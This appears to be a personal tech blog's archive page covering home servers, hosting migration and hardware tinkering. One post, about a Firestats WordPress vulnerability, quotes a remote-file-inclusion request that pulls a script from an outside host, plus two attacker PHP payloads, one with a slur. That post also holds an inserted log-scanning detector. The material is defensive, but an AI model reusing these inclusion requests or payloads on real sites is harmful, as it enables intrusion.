Adventures in hosting

March 21st, 2010

Recently I decided to go into the hosting business. Not in a big way mind you. Just to cover the costs of hosting primarily with perhaps enough left over for a night on the town once a month or to pay the phone bill.

As it happens I was lucky enough in that I had two clients ready to go with over 100 sites each. Starting up a business without having to look for clients is an absolute luxury especially in the middle of one of the worst recessions this country has ever seen. After making all the agreements with my future clients it was time to come up with a concrete migration plan.

Before a single site could be migrated several things needed to be taken into consideration:

  • Hardware
  • Software (Operating System and Control Panel)
  • Support/Knowledgebase/Helpdesk
  • Bandwidth requirements
  • Data import/migration/compatibility

The hardware was the easiest. I had a spare Dell PowerEdge 1850 hanging around here at home doing nothing with a not inconsiderable 6GB of RAM. The operating system was going to be a simple matter too. It was going to be Linux or nothing. However which Linux distribution to choose?

Choosing the Linux distribution was going to be directly related to my choice of control panel software. I wrote here sometime back about Virtualmin and I decided that it would be absolutely perfect for my control panel requirements. Having decided on the control panel software it was now up to me to choose between CentOS or Ubuntu 8.04LTS as the host OS. In the end out of familiarity I opted for Ubuntu.

One of the key reasons for choosing Virtualmin was its ability to import backups from cPanel. As I would be migrating almost 200 sites from a cPanel server in the U.S. the ability to seamlessly migrate would be an absolute bonus. Another important reason was that the control panel interface itself is very easy to use. Considering that my two future clients were coming from years of using cPanel I was confident that they would easily find their way around Virtualmin.

In February I installed the server into the datacentre and pulled across a couple of cPanel backups to test the import functionality. Of primary concern to me was that the existing server was running CentOS and using Exim as its MTA. The new server was the already mentioned Ubuntu and I had decided on Postfix as the MTA. In addition the home folders of the existing server were split between two disks mounted as /home and /home2.

So I pulled across two backups, one with /home as its location on the old server and the other with /home2, used the import function and in about 5 minutes both sites had been migrated flawlessly.

I couldn’t have been that lucky I thought to myself. Normally something goes awry especially when there are significant differences in software as well as software versions. I poked around all the config files and was astonished to see that everything looked as it should be.

Over the next week I made out a schedule for migration and before long all sites were up and running. My clients were happy as too were my clients’ clients. The only issues that cropped up were minor and were as a result of differences in the way Virtualmin handles user accounts compared to cPanel.

So that was over a month ago and with everyone happy I can reflect on what was accomplished. Most notably was there anything I could have done differently or more efficiently.

As it happens yes, there was something I could have done had I thought about it.

The hardware of the server is absolutely overkill for what it is doing. 6GB of RAM is way too much. Over the past month the most I have ever seen in use was just short of 800MB however having lots of free RAM is not a bad thing as Linux likes to use lots of it for cache.

The load on the old server was constantly around the 1.00 to 2.50 mark, the new server with its dual core Xeons is barely even breaking a sweat with load averages between 0.03 and 0.12.

What I should have done, and it’s obvious now, is that I should have installed a hypervisor like VMware ESX server and partitioned the physical machine into three virtual machines. One for each of my two clients and the third for myself.

In any event I have another PowerEdge 1850 and a pair of 1750s that I intend on installing into the datacentre in the not too distant future so now it is time to start planning for that.

To finish off here’s a screenshot:

What’s my Setup?

December 26th, 2009

Over at Tiernan’s blog he asks “what’s your setup?” I’ve decided to take him up on his question and although being unemployed for the past two years means my setup is nowhere near as powerful as his, nonetheless it’s not too bad either so here we go:

Primary Webserver:
Sun Blade 2000, 2 x 900Mhz UltraSPARC IIIi, 146GB disk space, 2GB RAM running Solaris 10

Second Webserver:
PentiumD 2.8 Ghz, 120GB disk space, 2GB RAM running Ubuntu 8.04.3

Third Webserver:
Pentium IV 3.0Ghz, 80GB disk space, 2GB RAM running Windows Server 2008

Fourth Webserver:
Xeon 2.4Ghz, 76GB disk space, 512MB RAM running Windows Server 2003

Primary Workstation:
PentiumD 2.8 Ghz, 768GB disk space, 3GB RAM, 512MB nVidia QuadroFX4400 running XP

Primary Fileserver:
Pentium IV 2.66Ghz, 500GB disk space, 1GB RAM running Windows Server 2008

E-mail/Groupware server:
Xeon 3.0Ghz, 146GB disk space, 1GB RAM running Ubuntu 6.04LTS and Zimbra

E-mail Gateway:
Celeron 2ghz, 40GB disk space, 1GB RAM running CentOS 5.0. Physical server converted from virtual appliance.

Reverse Proxy Server:
Pentium III 700Mhz, 40GB disk space, 512MB RAM running OpenBSD 4.5 and Squid 2.7

Outgoing Proxy server:
Sun Netra T1-120, 500Mhz UltraSPARC II, 36GB disk space, 2GB RAM running Solaris 10 and Squid 2.7

Primary Laptop:
Apple MacBook, 2.16Ghz Core2 Duo, 120GB disk space, 2GB RAM running OS X 10.5

Secondary Laptop:
Toshiba, 1.2Ghz Celeron, 40GB disk space, 384MB RAM running Ubuntu 9.10 for WiFi testing.

I have a few more odds and ends that are only occasionally in use. I have two more Sun Netra T1s, An HP 9000, L2000 (rp5420) and a couple of Pentium IIIs that are occasionally used for testing.

At the moment I would kill for a Core i7 setup but sadly funds are low at the moment and will be for the foreseeable future unfortunately!


How to put an old security appliance to work

November 14th, 2009

Way back towards the end of August I inherited some fairly half decent equipment. Among them were two Symantec 5420 Security Appliances. I took them despite not knowing what it was that I was going to do with them. After a while I simply forgot about them until I decided yesterday to do something.

As the licenses had expired they weren’t much use as a security appliance so first things first was to take the cover off and have a gander inside. As I suspected an €8,000 appliance from Symantec would of course be made from the cheapest parts available. The motherboard was from a company I had never heard of in all my years called iWill. Any references on the web point to them no longer existing. The CPU is a 2Ghz Celeron and it had 512MB RAM and a 40GB Maxtor hard disk. Connectivity wise there are 6 10/100Mbit Intel ethernet ports, two USB and one RS-232 port. Inside on a riser board is a PCI slot however fitting a normal PCI card such as a display adapter is out of the question as the IDE cable would block even the shortest ones and besides, VGA cards are not supported! In the second IDE slot is a 16MB SSD.

So what was I going to do to get a new OS up and running on it? I came across a forum post from a guy who managed to get pfsense (FreeBSD) installed on it but unfortunately his instructions were a bit lacking. Out of curiosity I hooked a console cable up to the RS-232 port and opened a terminal where I was quite pleased to be greeted by a login prompt. I logged in using the username admin with the password I got from the LED panel on the front and lo and behold I was in a root shell. I guessed that Symantec’s software probably ran on one of the BSDs or Linux from experience with Nokia Checkpoint which ran NetBSD I think.

Anyway I guessed correctly, the 5420 was running RedHat Linux 7.1. From the console I was able to garner a bit more about the hardware. In addition to the basic stuff I mentioned earlier there is a Broadcom Cryptographic Accelerator CPU on board. But back to my immediate problem. How to get another OS on it. After pondering for a few moments I decided to try and see if taking the disk out and sticking it into a spare PC and setting it up from there would work. I dusted off my trusty Optiplex Gx1 circa 1999 and proceeded to install Ubuntu 9.10 on the disk.

Before I stuck the disk back in the 5420 I made sure that I could access a shell via console cable. Thankfully there is some excellent documentation on the Ubuntu help site and in no time I was able to access the Dell via console cable and have access to the Grub boot menu on boot up as well.

Back into the 5420 did the disk go, console cable hooked up, terminal open and time to power up. To my absolute delight there was the Grub boot menu. I hit enter and up it loaded. Perfect! Except for one thing. I had no network access. Half way through diagnosing this the whole thing just froze on me so I rebooted. Not long after rebooting it froze again. It was then I remembered that the guy who installed pfsense on his one mentioned problems with ACPI.

Unfortunately as it would freeze up so quickly I was unable to fix it from a terminal so I had no other choice but to take the disk out and shove it back into the Dell again. Ubuntu 9.10 has a lot of things moved about and the new version of Grub had me a bit confused for a while but finally I got ACPI disabled and everything is working perfectly.

Being headless they aren’t much good for anything other than possibly their original intention as a security appliance. However I decided to set up one of them as a dedicated monitoring server running ntop and Munin. For that it is absolutely perfect!

2008 a DNS oddity

October 29th, 2009

Recently I have upgraded all bar one of my Windows servers to server 2008. This included upgrading a Windows 2003 Active Directory controller. It was a pleasant surprise to discover that everything went perfectly well with absolutely no initial issues. However after a couple of days one very odd issue began rearing its head.

My Windows 2008 DNS server (PDC upgraded from 2003) occasionally decided that it can no longer resolve .uk domains. It doesn’t matter if it is .co.uk, ac.uk or whatever .uk it just flat out refuses to resolve them unless I restart the service.

A second Windows 2008 server that I installed DNS on as a secondary server has the exact same issue. After a couple of days it will just stop resolving .uk domains!

After plenty of head scratching and searching I finally discovered this article on technet.

It requires a bit of registry editing but what puzzles me is that if the problem has been fairly well known for almost a year (that technet article is dated 29th January 2009) why is the fix still a registry hack?

Playing with Powerline Ethernet

September 3rd, 2009

I was out in Lidl a few months back and picked up a pair of powerline ethernet adapters for €40. Our house is a couple of hundred years old and has walls that are around half a metre thick. This means that my wireless access point is inaccessible in some parts of the house so I figured that the powerline adapters would be perfect to setup an access point at the other end of the house. My cunning plan worked much better than I hoped for.

A quick bandwidth test with my laptop connected directly to the adapter gave transfer rates of 40Mbit when copying an iso image from one of my file servers. I hooked up the access point and all was well. Latency is quite good too and the transfer rates have been consistent. All told I was pleased.

However as I now have so much equipment crammed into such a small room here at home, things have been getting a little toasty and with the addition of a Dell Poweredge 1750 humming along with my Poweredge 2800 things have been getting exceptionally noisy as well. There is only one course of action and that is to move them out of my computer room to somewhere else. Unfortunately there is nowhere else in the house to put them as the noise is very hard to escape from.

The only option I could think of is a garage that we own which is about 250m from our house. It is nice and dry, secure and more importantly cool so it would be pretty safe to install a rack in there. Unfortunately it is too far to run an ethernet cable to and I don’t have line of sight to set up a wireless connection. But the garage is connected to our domestic electricity supply so I figured I would do a quick test to see if my cheap powerline ethernet connectors would work up there.

Armed with my laptop and one of the adapters I headed off to the garage and plugged in. Almost instantly the adapter found its partner back at home and my laptop picked up its IP address and lo and behold I was now connected to my LAN.

Browsing the net seemed very snappy indeed but if I was going to install a rack there I needed to find out if I would have enough bandwidth there to make it worth my while. So I downloaded the same iso image that I used for my first test and was mildly surprised with the results. The transfer rate as I thought it would had dropped significantly but it is a solid 12Mbit which is quite usable indeed.

My plan is to move my web and mail servers up there and keep my file servers back in my home office. All I need now is a rack!

Various updates

August 25th, 2009

It’s been absolutely ages since I last wrote here and I had been meaning to do so for some time. Since my last entry I have been tinkering away with my setup as I do on a regular basis and plenty of things have changed here on the back end. I suppose I will begin with my connection and move up the chain from there.

First up is a new router. I picked up a nice Cisco 837 for a very reasonable price. I had a bit of fiddling to get it up and running with eircom broadband but I got there in the end and I have documented the procedure over on my wiki.

Next up is my reverse proxy. It is still running on the same hardware but I decided to move from Linux over to OpenBSD. My primary reason for this is that I was getting sick and tired of Linux iptables. In addition I concluded that Squid’s performance wasn’t optimal either. A move to OpenBSD seems to have resolved both those issues for me. PF on BSD is very configurable and easy to understand as well. Needless to say I have documented my experiences with PF over on my wiki also.

I’ve also gotten my hands on some new hardware. Well new hardware to me that is. I picked up three Sun Netra T1 servers, a Dell PowerEdge 1750 and two Symantec 5420 Firewall appliances.

So far I have been busy setting up the three Netras. They don’t have CD-ROM drives or display adapters so I had to install them over the network which was a process that was actually relatively simple. However it was only simple in that I already have a couple of other Sun machines here one of which I was able to use as an install server. Of course I have this process documented on my wiki also.

I haven’t decided what I will use the Netras for yet. One of them seems to have CPU problems and has been cannibalised to increase the specs. of the other two. They have 500Mhz UltraSparc IIe CPUs so by today’s standards are not at all that powerful but they do draw very little power, certainly less than a Pentium IV machine so I may set them up as file servers. Initially I was hoping to install OpenBSD on one of them to use as my reverse proxy but unfortunately an OpenBSD network install does not seem to be as straight forward as Solaris.

The PowerEdge 1750 I had hoped to set up as a webserver running either IIS or Apache. Unfortunately it only has 512MB of RAM so until I get some more for it that rules out Server 2008. However it is incredibly loud and that rules out keeping it running in my computer room. I am currently planning on setting up a dedicated computer room as it were in another part of the house so check back here for updates on that.

Firestats WordPress Exploit

June 13th, 2009

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there have been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to have two versions. The most common one like above has the following contents:

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

The other one contains the following:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }

echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.
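One way to pull these probes out of a web server access log, as an added example that is not part of the original post: it flags any request to firestats-wordpress.php whose parameter value is a remote URL, which goes slightly beyond the single fs_javascript sample above. The combined log format, the client addresses and the payload.example host are assumptions made for the sample.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a remote URL marks the inclusion attempt.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SCRIPT = "firestats-wordpress.php"  # file named in the post

# Constructed sample log. The first request target is the one quoted in the
# post; addresses, the payload.example host and all other fields are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jun/2009:10:01:02 +0100] "GET /tag/wp-content/plugins/'
    'firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/'
    'board/forum/fx29id.txt?? HTTP/1.1" 404 512 "-" "-"',
    '198.51.100.7 - - [13/Jun/2009:10:01:09 +0100] "GET /wp-content/plugins/'
    'firestats/firestats-wordpress.php?fs_javascript=http%3A%2F%2Fpayload.'
    'example%2Fid.txt%3F HTTP/1.1" 200 87 "-" "-"',
    '192.0.2.10 - - [13/Jun/2009:10:02:00 +0100] "GET /index.php?p=12 '
    'HTTP/1.1" 200 9120 "-" "-"',
    '203.0.113.5 - - [13/Jun/2009:10:03:00 +0100] "GET /wp-content/plugins/'
    'firestats/firestats-wordpress.php?fs_javascript=local.js HTTP/1.1" '
    '200 300 "-" "-"',
]

def _split(url):
    """urlsplit that tolerates malformed input found in real logs."""
    try:
        return urlsplit(url)
    except ValueError:
        return None

def find_inclusion_probes(lines, script=SCRIPT):
    """Return one record per request that passes a remote URL to `script`."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        target = _split(m["target"]) if m else None
        if target is None or not target.path.endswith("/" + script):
            continue
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                payload = _split(value)
                hits.append({
                    "ip": m["ip"], "time": m["ts"],
                    "status": int(m["status"]), "param": name,
                    "payload_url": value,
                    "payload_host": payload.hostname if payload else None,
                })
    return hits

def summarize(hits):
    """Count probes per client and per payload host; list clients that got 200."""
    return {
        "by_ip": Counter(h["ip"] for h in hits),
        "by_host": Counter(h["payload_host"] for h in hits),
        # 200 means the plugin file exists and answered: check these first.
        "served": sorted({h["ip"] for h in hits if h["status"] == 200}),
    }

if __name__ == "__main__":
    found = find_inclusion_probes(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["status"], h["param"], h["payload_url"])
    print(summarize(found))
```

Requests that returned 200 are the ones to follow up on, since a 404 only shows that the probed path does not exist on that site.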

Microsoft Web Platform Installer an IIS ‘must have’

April 12th, 2009

Microsoft have played a bit of a blinder. I’ve always found it a nightmare to set up ASP.net applications on IIS. Even getting PHP up and running and playing nice on IIS can be an absolute nightmare at times. No more however. If you are running IIS 6 or 7 then it is well worth your while installing Microsoft’s Web Platform Installer.

At the moment I’m using version 2 which is in beta but it is fine for production use albeit with one very unusual and weird quirk. If you try to install a package it will throw a wobbly if you are not in the Pacific, US and Canada time zone. So change the time zone before installing a web app and don’t forget to change it back once you are finished.

Rather than wax on about it myself I will just rehash Microsoft’s blurb:

The Microsoft Web Platform Installer 2.0 (Web PI) is a free tool that makes it simple to download, install and keep up-to-date with the latest components of the Microsoft Web Platform, including Internet Information Services (IIS), SQL Server Express, .NET Framework and Visual Web Developer. In addition, install popular open source ASP.NET and PHP web apps with the Web PI.

If you have to administer or are setting up an IIS server then it’s an essential install!

My iPhone is kaput already

April 7th, 2009

I only bought it in November and two days ago the microphone stopped working. I could hear others when they called but they couldn’t hear me.

Yesterday a friend who called claimed that my voice sounded like that of a Dalek from Doctor Who. So now I’m left with what is essentially an iPod touch. All going well it should be under warranty given that it is only 5 months old.

Other strange glitches started to appear lately as well. The wi-fi connection kept dropping on me despite being in the same room as the router. Applications would start to hang with alarming regularity requiring frequent reboots. Grr.. extremely annoying so it is.


IBM and Sun courting

March 18th, 2009

The Wall Street Journal has an article today that confirms that IBM is having discussions with Sun over a possible acquisition. This isn’t the first time that IBM have had discussions with Sun but given the current economic climate it might be a real possibility this time around. Also it would potentially be an easy sell to current Sun shareholders who have seen their shares decline steadily in value over recent years.

What will this mean for the technology industry? Well both IBM and Sun overlap in quite a few areas so here are the ones I can think of off the top of my head:

  • IBM PowerPC and Sun SPARC CPUs
  • IBM Lotus Symphony and Star/OpenOffice
  • IBM DB2 and Sun’s MySQL
  • IBM AIX and Sun Solaris
  • IBM Storage and Sun Storage/StorageTek

The crown jewels of a take over would probably be Java and MySQL but IBM swallowing up Sun would create more than a few jitters for EMC who presently rule the storage market.

Of course with the potential acquisition of Sun by IBM it will inevitably be compared to the HP take over of Compaq. Both HP and Compaq were in competition with each other in the enterprise computing market with HP’s PA-RISC based servers competing with Compaq’s Alphas (in turn acquired by Compaq’s take over of DEC). They also had competing operating systems with HP’s HP-UX vs Compaq Tru64.

Of course it wasn’t long after that merger was completed when HP killed off Alpha and Tru64.

Would IBM kill off SPARC and Solaris? I would speculate that they might kill off SPARC but focus purely on Solaris for x86. It might make sense for IBM to keep Solaris on x86 as they currently don’t have an x86 version of AIX. This is all conjecture of course and as the talks are at an early stage the deal might fall through yet.

Time will tell.
